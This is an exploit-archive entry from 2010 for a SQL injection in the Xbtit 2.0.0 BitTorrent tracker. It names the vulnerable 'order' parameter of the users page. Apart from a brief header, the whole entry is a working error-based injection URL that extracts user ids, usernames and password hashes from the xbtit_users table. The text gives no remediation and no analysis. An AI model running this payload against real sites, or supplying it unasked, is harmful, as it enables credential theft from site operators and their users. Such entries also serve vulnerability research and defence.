Xbtit 2.0.0 - SQL Injection



EKU-ID: 18992 CVE: OSVDB-62922 OSVDB-ID:
Author: Ctacok Published: 2010-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


####################################################
# Title     : Xbtit SQL Injection Vulnerability    #
# Author    : Ctacok                               #
# Homepage  : http://ctacok.ru/                    #
####################################################

####################################################
#  Vulnerable File :
 /index.php?page=users&order=[SQL]&by=ASC

####################################################
#  ExploiT         :

/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC

####################################################